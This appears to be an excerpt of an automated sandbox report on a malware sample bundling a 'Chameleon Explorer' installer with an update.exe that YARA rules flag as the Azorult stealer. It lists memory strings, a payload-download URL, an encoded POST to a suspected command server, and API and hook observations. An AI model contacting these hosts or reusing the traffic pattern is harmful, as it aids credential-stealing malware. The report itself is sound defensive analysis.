Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=
Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com/reg.php?program=
Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com/subscription/?action=extend&key=
Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com/subscription/?action=latest&key=
Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com/windows-explorer/embed/H
Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com/windows-explorer/extensions.phpH
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3
Source: cexplorer.tmp, 00000007.00000003.390562149.000000000337A000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3&
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3V$mP$mP
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3Y4=A4=AhXInno
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3_lmPlmP
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3c
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3d
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3e
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3f
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3g
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3h
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3j
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3l
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com3t
Source: cexplorer.exe, 00000006.00000003.302777992.0000000002490000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.305051880.0000000003110000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co
Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.comH
Source: cexplorer.exe, 00000006.00000003.400041300.0000000002374000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.comQN7
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.comS
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.comSQ
Source: cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.comc
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.coms
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.comsK
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.dk-soft.org/
Source: cexplorer.exe, 00000006.00000003.303106895.000000007FD80000.00000004.00000001.sdmp, cexplorer.tmp, cexplorer.tmp, 00000007.00000000.304413870.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: cexplorer.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.293482923.0000000005310000.00000004.00000001.sdmp, cexplorer.exe, 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.palkornel.hu/innosetup%1
Source: cexplorer.exe, 00000006.00000003.303106895.000000007FD80000.00000004.00000001.sdmp, cexplorer.tmp	String found in binary or memory: http://www.remobjects.com/ps
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://www.startssl.com/0Q
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://www.startssl.com/policy0
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000002.325491301.00000000048DF000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000002.325445645.0000000004885000.00000004.00000001.sdmp, 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000002.325328891.000000000475A000.00000004.00000001.sdmp, 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.316033245.000000000492D000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/1AiP77
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: update.exe	String found in binary or memory: https://dotbit.me/a/
Source: ChameleonExplorer.exe, 00000009.00000002.342353630.00000000015F1000.00000004.00000020.sdmp	String found in binary or memory: https://neosoft-activator.appspot.com/
Source: ChameleonExplorer.exe, 00000009.00000002.342353630.00000000015F1000.00000004.00000020.sdmp	String found in binary or memory: https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: https://www.startssl.com/policy0

Source: unknown

DNS traffic detected: queries for: 2no.co

Source: global traffic	HTTP traffic detected: GET /1AiP77 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 2no.co
Source: global traffic	HTTP traffic detected: GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-7E632307063B35A85D7B937531F0F205-7C15ED8E2F17D25630909AB97B3C48BC&vrs=3.0.0.505&prg=explorer&uid=60b9c0cce07334e8d8e321d0efeb9099 HTTP/1.1User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)Host: neosoft-activator.appspot.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1User-Agent: Chameleon Static (Ver: 3.0.0.505)Host: www.chameleon-managers.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /info/versions/ HTTP/1.1User-Agent: Chameleon checker ( Ver: 3.0.0.505)Host: www.chameleon-managers.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: finlzzm.comContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 35 2f fb 35 2f fb 3b 2f fb 38 4b ed 3e 3f ed 3f 4e 8b 28 39 f1 28 39 f1 28 39 f1 28 39 f1 48 4f ed 3e 3e ed 3e 3a Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/5/5/;/8K>??N(9(9(9(9HO>>>:

Source: unknown	HTTPS traffic detected: 5.9.164.117:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.52:443 -> 192.168.2.3:49747 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_0045C584 GetKeyboardState,

7_2_0045C584

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_00434448 GetObjectW,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

7_2_00434448

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.310113197.0000000004577000.00000004.00000001.sdmp

Binary or memory string: _WINAPI_GETRAWINPUTDATAN

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe

Windows user hook set: 0 mouse C:\Program Files (x86)\Chameleon Explorer\Folder.dll

Jump to behavior

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 8.2.update.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 8.2.update.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 8.3.update.exe.460000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 8.3.update.exe.460000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly

Binary is likely a compiled AutoIt script file

Show sources

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000002.322294826.0000000000495000.00000040.00020000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000002.322294826.0000000000495000.00000040.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0041201D	6_2_0041201D
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00402260	6_2_00402260
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00412320	6_2_00412320
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040D33C	6_2_0040D33C
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0041259C	6_2_0041259C
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00411F58	6_2_00411F58
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004E2284	7_2_004E2284
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004F2388	7_2_004F2388
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004E2D99	7_2_004E2D99
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004CF440	7_2_004CF440
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004736F8	7_2_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004AC17C	7_2_004AC17C
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004FCA0C	7_2_004FCA0C
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00488C40	7_2_00488C40
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00481C84	7_2_00481C84
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0049E118	7_2_0049E118
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004EA1FC	7_2_004EA1FC
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00402474	7_2_00402474
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0044A72C	7_2_0044A72C
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004C6BD4	7_2_004C6BD4
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004E6F44	7_2_004E6F44
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004BB20C	7_2_004BB20C
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004EB2B0	7_2_004EB2B0
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: 14_2_03427F10	14_2_03427F10

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cexplorer.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cexplorer.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cexplorer.tmp.6.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: cexplorer.tmp.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cexplorer.tmp.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-VD36P.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-VD36P.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-VD36P.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-T1IK9.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-FAUA3.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-M2PIB.tmp.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Section loaded: folder.dll			Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe	Section loaded: folder64.dll

Source: is-T1IK9.tmp.7.dr	Static PE information: Number of sections : 11 > 10
Source: is-FAUA3.tmp.7.dr	Static PE information: Number of sections : 11 > 10
Source: is-M2PIB.tmp.7.dr	Static PE information: Number of sections : 11 > 10

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: 8.2.update.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
